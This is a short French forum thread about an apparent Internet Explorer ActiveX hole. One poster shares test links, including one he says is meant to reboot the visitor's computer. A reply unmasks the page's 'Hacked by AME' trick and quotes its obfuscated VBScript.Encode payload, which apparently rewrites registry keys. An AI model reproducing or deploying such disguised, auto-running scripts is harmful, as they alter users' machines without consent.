Aller au contenu
  • Pas encore inscrit ?

Pourquoi ne pas vous inscrire ? C'est simple, rapide et gratuit.
    Pour en savoir plus, lisez Les avantages de l'inscription... et la Charte de Zébulon.
    De plus, les messages que vous postez en tant qu'invité restent invisibles tant qu'un modérateur ne les a pas validés. Inscrivez-vous, ce sera un gain de temps pour tout le monde, vous, les helpeurs et les modérateurs ! :wink:

Messages recommandés

Posté(e)

C'est bizarre tout ça ! J'espère que c'est un problème de mon ordi !

Faisons un test.

Allez ici avec IE : http://leneuf22.free.fr/test.htm

Ça ne marchera peut-être pas sur win95/98/ME

Dites moi si vous avez un message d'avertissement avant que le cadre gris n'apparaisse.

Si oui, c'est bien.

Sinon, Microsoft a fait une énorme bavure, et le pire, c'est que la faille est vraiment conne, donc certains pourront l'utiliser sans problèmes pour faire ****** le monde...

Chez moi, il n'y a AUCUN message d'avertissement.

Pour info, j'utilise IE 5.5 et Win98

Posté(e)

Avec IE6 (niveau de securite moyen), win meuh, j'ai le message "Les parametres de securite actuels ne vous permettent pas d'executer les controles activeX de cette page. En consequence, cette page ne sera peut-etre pas affichee correctement"

Si j'avais pas eu ce message, il aurait fait quoi ton prog?

Posté(e)

Ah, au moins, tu es averti !

Mon lien en page précédente est censé faire rebooter l'ordi. (et je dis bien censé, car tout les ordis ne possèdent pas ce qu'il faut)

Et mon lien juste au dessus, il ne fait rien, il apparait juste un cadre gris sur la page. Pas de danger, c'était juste pour tester.

Mais ce cadre gris aurait pu contenir du code pour faire n'importe quoi sur le disque dur.

Et moi, je ne suis pas averti du danger...

Posté(e)

"Hacked by AME" ? Non merci, je n'y vais pas. (J'ai vérifié le code de la page, héhé)

La prochaîne fois, encode ton script :P

<script Language="VBScript.Encode">#@~^CAEAAA==jY~q/4?tV^~',Z.+mYn6(L+1O`r?1.rwDRUtnVsE*@#@&k4?4+sscI+L9VnY~rCFA5|Sr;bdmHzZuqg2wjH/Yh-;EDMnUY;W	Y.WsjYwZKUYMWsw;W:2;D+.1mh-E@#@&q/tUtsVcInoqDrOPJ_F2I{S}/)S|HzZuqH3'?z/Dn:'Z;.M+xO/KxODKsU+O'ZKxYMW^wZK:2ED+.Hm:+'/WswEDn.1m:-/Wh2!YnDgC:JSE_lmVn9P8X,)t2EgVwAAA==^#~@</script>

Petit malin, va !